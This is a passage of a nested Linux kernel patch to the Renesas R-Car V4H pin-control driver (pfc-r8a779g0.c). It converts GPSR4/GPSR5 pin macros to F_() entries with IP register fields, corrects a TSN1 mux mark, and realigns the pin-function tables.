+ static const unsigned int tsn1_avtp_pps_mux[] = {
+-	TSN0_AVTP_PPS_MARK,
++	TSN1_AVTP_PPS_MARK,
+ };
+ static const unsigned int tsn1_avtp_capture_a_pins[] = {
+ 	/* TSN1_AVTP_CAPTURE_A */
+diff --git a/drivers/pinctrl/renesas/pfc-r8a779g0.c b/drivers/pinctrl/renesas/pfc-r8a779g0.c
+index 5dd1c2c7708a8..43a63a21a6fb5 100644
+--- a/drivers/pinctrl/renesas/pfc-r8a779g0.c
++++ b/drivers/pinctrl/renesas/pfc-r8a779g0.c
+@@ -156,54 +156,54 @@
+ #define GPSR3_0		F_(MMC_SD_D1,		IP0SR3_3_0)
+ 
+ /* GPSR4 */
+-#define GPSR4_24	FM(AVS1)
+-#define GPSR4_23	FM(AVS0)
+-#define GPSR4_22	FM(PCIE1_CLKREQ_N)
+-#define GPSR4_21	FM(PCIE0_CLKREQ_N)
+-#define GPSR4_20	FM(TSN0_TXCREFCLK)
+-#define GPSR4_19	FM(TSN0_TD2)
+-#define GPSR4_18	FM(TSN0_TD3)
+-#define GPSR4_17	FM(TSN0_RD2)
+-#define GPSR4_16	FM(TSN0_RD3)
+-#define GPSR4_15	FM(TSN0_TD0)
+-#define GPSR4_14	FM(TSN0_TD1)
+-#define GPSR4_13	FM(TSN0_RD1)
+-#define GPSR4_12	FM(TSN0_TXC)
+-#define GPSR4_11	FM(TSN0_RXC)
+-#define GPSR4_10	FM(TSN0_RD0)
+-#define GPSR4_9		FM(TSN0_TX_CTL)
+-#define GPSR4_8		FM(TSN0_AVTP_PPS0)
+-#define GPSR4_7		FM(TSN0_RX_CTL)
+-#define GPSR4_6		FM(TSN0_AVTP_CAPTURE)
+-#define GPSR4_5		FM(TSN0_AVTP_MATCH)
+-#define GPSR4_4		FM(TSN0_LINK)
+-#define GPSR4_3		FM(TSN0_PHY_INT)
+-#define GPSR4_2		FM(TSN0_AVTP_PPS1)
+-#define GPSR4_1		FM(TSN0_MDC)
+-#define GPSR4_0		FM(TSN0_MDIO)
++#define GPSR4_24	F_(AVS1,		IP3SR4_3_0)
++#define GPSR4_23	F_(AVS0,		IP2SR4_31_28)
++#define GPSR4_22	F_(PCIE1_CLKREQ_N,	IP2SR4_27_24)
++#define GPSR4_21	F_(PCIE0_CLKREQ_N,	IP2SR4_23_20)
++#define GPSR4_20	F_(TSN0_TXCREFCLK,	IP2SR4_19_16)
++#define GPSR4_19	F_(TSN0_TD2,		IP2SR4_15_12)
++#define GPSR4_18	F_(TSN0_TD3,		IP2SR4_11_8)
++#define GPSR4_17	F_(TSN0_RD2,		IP2SR4_7_4)
++#define GPSR4_16	F_(TSN0_RD3,		IP2SR4_3_0)
++#define GPSR4_15	F_(TSN0_TD0,		IP1SR4_31_28)
++#define GPSR4_14	F_(TSN0_TD1,		IP1SR4_27_24)
++#define GPSR4_13	F_(TSN0_RD1,		IP1SR4_23_20)
++#define GPSR4_12	F_(TSN0_TXC,		IP1SR4_19_16)
++#define GPSR4_11	F_(TSN0_RXC,		IP1SR4_15_12)
++#define GPSR4_10	F_(TSN0_RD0,		IP1SR4_11_8)
++#define GPSR4_9		F_(TSN0_TX_CTL,		IP1SR4_7_4)
++#define GPSR4_8		F_(TSN0_AVTP_PPS0,	IP1SR4_3_0)
++#define GPSR4_7		F_(TSN0_RX_CTL,		IP0SR4_31_28)
++#define GPSR4_6		F_(TSN0_AVTP_CAPTURE,	IP0SR4_27_24)
++#define GPSR4_5		F_(TSN0_AVTP_MATCH,	IP0SR4_23_20)
++#define GPSR4_4		F_(TSN0_LINK,		IP0SR4_19_16)
++#define GPSR4_3		F_(TSN0_PHY_INT,	IP0SR4_15_12)
++#define GPSR4_2		F_(TSN0_AVTP_PPS1,	IP0SR4_11_8)
++#define GPSR4_1		F_(TSN0_MDC,		IP0SR4_7_4)
++#define GPSR4_0		F_(TSN0_MDIO,		IP0SR4_3_0)
+ 
+ /* GPSR 5 */
+-#define GPSR5_20	FM(AVB2_RX_CTL)
+-#define GPSR5_19	FM(AVB2_TX_CTL)
+-#define GPSR5_18	FM(AVB2_RXC)
+-#define GPSR5_17	FM(AVB2_RD0)
+-#define GPSR5_16	FM(AVB2_TXC)
+-#define GPSR5_15	FM(AVB2_TD0)
+-#define GPSR5_14	FM(AVB2_RD1)
+-#define GPSR5_13	FM(AVB2_RD2)
+-#define GPSR5_12	FM(AVB2_TD1)
+-#define GPSR5_11	FM(AVB2_TD2)
+-#define GPSR5_10	FM(AVB2_MDIO)
+-#define GPSR5_9		FM(AVB2_RD3)
+-#define GPSR5_8		FM(AVB2_TD3)
+-#define GPSR5_7		FM(AVB2_TXCREFCLK)
+-#define GPSR5_6		FM(AVB2_MDC)
+-#define GPSR5_5		FM(AVB2_MAGIC)
+-#define GPSR5_4		FM(AVB2_PHY_INT)
+-#define GPSR5_3		FM(AVB2_LINK)
+-#define GPSR5_2		FM(AVB2_AVTP_MATCH)
+-#define GPSR5_1		FM(AVB2_AVTP_CAPTURE)
+-#define GPSR5_0		FM(AVB2_AVTP_PPS)
++#define GPSR5_20	F_(AVB2_RX_CTL,		IP2SR5_19_16)
++#define GPSR5_19	F_(AVB2_TX_CTL,		IP2SR5_15_12)
++#define GPSR5_18	F_(AVB2_RXC,		IP2SR5_11_8)
++#define GPSR5_17	F_(AVB2_RD0,		IP2SR5_7_4)
++#define GPSR5_16	F_(AVB2_TXC,		IP2SR5_3_0)
++#define GPSR5_15	F_(AVB2_TD0,		IP1SR5_31_28)
++#define GPSR5_14	F_(AVB2_RD1,		IP1SR5_27_24)
++#define GPSR5_13	F_(AVB2_RD2,		IP1SR5_23_20)
++#define GPSR5_12	F_(AVB2_TD1,		IP1SR5_19_16)
++#define GPSR5_11	F_(AVB2_TD2,		IP1SR5_15_12)
++#define GPSR5_10	F_(AVB2_MDIO,		IP1SR5_11_8)
++#define GPSR5_9		F_(AVB2_RD3,		IP1SR5_7_4)
++#define GPSR5_8		F_(AVB2_TD3,		IP1SR5_3_0)
++#define GPSR5_7		F_(AVB2_TXCREFCLK,	IP0SR5_31_28)
++#define GPSR5_6		F_(AVB2_MDC,		IP0SR5_27_24)
++#define GPSR5_5		F_(AVB2_MAGIC,		IP0SR5_23_20)
++#define GPSR5_4		F_(AVB2_PHY_INT,	IP0SR5_19_16)
++#define GPSR5_3		F_(AVB2_LINK,		IP0SR5_15_12)
++#define GPSR5_2		F_(AVB2_AVTP_MATCH,	IP0SR5_11_8)
++#define GPSR5_1		F_(AVB2_AVTP_CAPTURE,	IP0SR5_7_4)
++#define GPSR5_0		F_(AVB2_AVTP_PPS,	IP0SR5_3_0)
+ 
+ /* GPSR 6 */
+ #define GPSR6_20	F_(AVB1_TXCREFCLK,		IP2SR6_19_16)
+@@ -268,209 +268,271 @@
+ #define GPSR8_0		F_(SCL0,			IP0SR8_3_0)
+ 
+ /* SR0 */
+-/* IP0SR0 */		/* 0 */			/* 1 */			/* 2 */		/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
+-#define IP0SR0_3_0	F_(0, 0)		FM(ERROROUTC_B)		FM(TCLK2_A)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR0_7_4	F_(0, 0)		FM(MSIOF3_SS1)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR0_11_8	F_(0, 0)		FM(MSIOF3_SS2)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR0_15_12	FM(IRQ3)		FM(MSIOF3_SCK)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR0_19_16	FM(IRQ2)		FM(MSIOF3_TXD)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR0_23_20	FM(IRQ1)		FM(MSIOF3_RXD)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR0_27_24	FM(IRQ0)		FM(MSIOF3_SYNC)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR0_31_28	FM(MSIOF5_SS2)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-
+-/* IP1SR0 */		/* 0 */			/* 1 */			/* 2 */		/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
+-#define IP1SR0_3_0	FM(MSIOF5_SS1)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR0_7_4	FM(MSIOF5_SYNC)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR0_11_8	FM(MSIOF5_TXD)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR0_15_12	FM(MSIOF5_SCK)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR0_19_16	FM(MSIOF5_RXD)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR0_23_20	FM(MSIOF2_SS2)		FM(TCLK1)		FM(IRQ2_A)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR0_27_24	FM(MSIOF2_SS1)		FM(HTX1)		FM(TX1)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR0_31_28	FM(MSIOF2_SYNC)		FM(HRX1)		FM(RX1)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-
+-/* IP2SR0 */		/* 0 */			/* 1 */			/* 2 */		/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
+-#define IP2SR0_3_0	FM(MSIOF2_TXD)		FM(HCTS1_N)		FM(CTS1_N)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP2SR0_7_4	FM(MSIOF2_SCK)		FM(HRTS1_N)		FM(RTS1_N)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP2SR0_11_8	FM(MSIOF2_RXD)		FM(HSCK1)		FM(SCK1)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++/* IP0SR0 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
++#define IP0SR0_3_0	F_(0, 0)		FM(ERROROUTC_N_B)	FM(TCLK2_A)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR0_7_4	F_(0, 0)		FM(MSIOF3_SS1)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR0_11_8	F_(0, 0)		FM(MSIOF3_SS2)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR0_15_12	FM(IRQ3)		FM(MSIOF3_SCK)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR0_19_16	FM(IRQ2)		FM(MSIOF3_TXD)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR0_23_20	FM(IRQ1)		FM(MSIOF3_RXD)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR0_27_24	FM(IRQ0)		FM(MSIOF3_SYNC)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR0_31_28	FM(MSIOF5_SS2)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++
++/* IP1SR0 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
++#define IP1SR0_3_0	FM(MSIOF5_SS1)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR0_7_4	FM(MSIOF5_SYNC)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR0_11_8	FM(MSIOF5_TXD)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR0_15_12	FM(MSIOF5_SCK)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR0_19_16	FM(MSIOF5_RXD)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR0_23_20	FM(MSIOF2_SS2)		FM(TCLK1)		FM(IRQ2_A)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR0_27_24	FM(MSIOF2_SS1)		FM(HTX1)		FM(TX1)			F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR0_31_28	FM(MSIOF2_SYNC)		FM(HRX1)		FM(RX1)			F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++
++/* IP2SR0 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
++#define IP2SR0_3_0	FM(MSIOF2_TXD)		FM(HCTS1_N)		FM(CTS1_N)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR0_7_4	FM(MSIOF2_SCK)		FM(HRTS1_N)		FM(RTS1_N)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR0_11_8	FM(MSIOF2_RXD)		FM(HSCK1)		FM(SCK1)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+ 
+ /* SR1 */
+-/* IP0SR1 */		/* 0 */			/* 1 */			/* 2 */		/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
+-#define IP0SR1_3_0	FM(MSIOF1_SS2)		FM(HTX3_A)		FM(TX3)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR1_7_4	FM(MSIOF1_SS1)		FM(HCTS3_N_A)		FM(RX3)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR1_11_8	FM(MSIOF1_SYNC)		FM(HRTS3_N_A)		FM(RTS3_N)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR1_15_12	FM(MSIOF1_SCK)		FM(HSCK3_A)		FM(CTS3_N)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR1_19_16	FM(MSIOF1_TXD)		FM(HRX3_A)		FM(SCK3)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR1_23_20	FM(MSIOF1_RXD)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR1_27_24	FM(MSIOF0_SS2)		FM(HTX1_X)		FM(TX1_X)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR1_31_28	FM(MSIOF0_SS1)		FM(HRX1_X)		FM(RX1_X)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-
+-/* IP1SR1 */		/* 0 */			/* 1 */			/* 2 */		/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
+-#define IP1SR1_3_0	FM(MSIOF0_SYNC)		FM(HCTS1_N_X)		FM(CTS1_N_X)	FM(CANFD5_TX_B)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR1_7_4	FM(MSIOF0_TXD)		FM(HRTS1_N_X)		FM(RTS1_N_X)	FM(CANFD5_RX_B)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR1_11_8	FM(MSIOF0_SCK)		FM(HSCK1_X)		FM(SCK1_X)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR1_15_12	FM(MSIOF0_RXD)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR1_19_16	FM(HTX0)		FM(TX0)			F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR1_23_20	FM(HCTS0_N)		FM(CTS0_N)		FM(PWM8_A)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR1_27_24	FM(HRTS0_N)		FM(RTS0_N)		FM(PWM9_A)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR1_31_28	FM(HSCK0)		FM(SCK0)		FM(PWM0_A)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-
+-/* IP2SR1 */		/* 0 */			/* 1 */			/* 2 */		/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
+-#define IP2SR1_3_0	FM(HRX0)		FM(RX0)			F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP2SR1_7_4	FM(SCIF_CLK)		FM(IRQ4_A)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP2SR1_11_8	FM(SSI_SCK)		FM(TCLK3)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP2SR1_15_12	FM(SSI_WS)		FM(TCLK4)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP2SR1_19_16	FM(SSI_SD)		FM(IRQ0_A)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP2SR1_23_20	FM(AUDIO_CLKOUT)	FM(IRQ1_A)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP2SR1_27_24	FM(AUDIO_CLKIN)		FM(PWM3_A)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP2SR1_31_28	F_(0, 0)		FM(TCLK2)		FM(MSIOF4_SS1)	FM(IRQ3_B)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-
+-/* IP3SR1 */		/* 0 */			/* 1 */			/* 2 */		/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
+-#define IP3SR1_3_0	FM(HRX3)		FM(SCK3_A)		FM(MSIOF4_SS2)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP3SR1_7_4	FM(HSCK3)		FM(CTS3_N_A)		FM(MSIOF4_SCK)	FM(TPU0TO0_A)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP3SR1_11_8	FM(HRTS3_N)		FM(RTS3_N_A)		FM(MSIOF4_TXD)	FM(TPU0TO1_A)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP3SR1_15_12	FM(HCTS3_N)		FM(RX3_A)		FM(MSIOF4_RXD)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP3SR1_19_16	FM(HTX3)		FM(TX3_A)		FM(MSIOF4_SYNC)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++/* IP0SR1 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
++#define IP0SR1_3_0	FM(MSIOF1_SS2)		FM(HTX3_A)		FM(TX3)			F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
